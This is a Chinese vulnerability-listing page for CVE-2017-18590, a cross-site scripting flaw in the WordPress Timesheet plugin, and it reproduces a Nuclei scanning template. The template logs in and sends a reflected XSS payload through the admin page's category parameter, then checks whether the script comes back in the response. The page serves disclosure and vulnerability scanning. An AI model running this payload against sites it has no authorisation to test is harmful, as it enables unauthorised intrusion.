CVE-2017-18590: Timesheet Plugin < 0.1.5 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Timesheet Plugin | POC: 已公开

漏洞描述

The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.

PoC代码[已公开]

id: CVE-2017-18590

info:
  name: Timesheet Plugin < 0.1.5 - Cross-Site Scripting
  author: Splint3r7
  severity: medium
  description: |
    The Timesheet plugin before 0.1.5 for WordPress has multiple XSS issues.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18590
    - https://downloads.wordpress.org/plugin/timesheet
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18590
    cwe-id: CWE-79
    epss-score: 0.00075
    epss-percentile: 0.23314
    cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: timesheet
    framework: wordpress
  tags: cve,cve2017,wordpress,wp,wp-plugin,bws-promobar,xss,authenticated,timesheet

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/timesheet")'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
        condition: and
# digest: 4a0a0047304502203bd30dd2cab77732a7b945346e35fe97deb9459591c8337cca8cec3f6823cadf022100b40926171267574f21601b1ac2593044b079a108438b0e70217a8d841cda2da3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐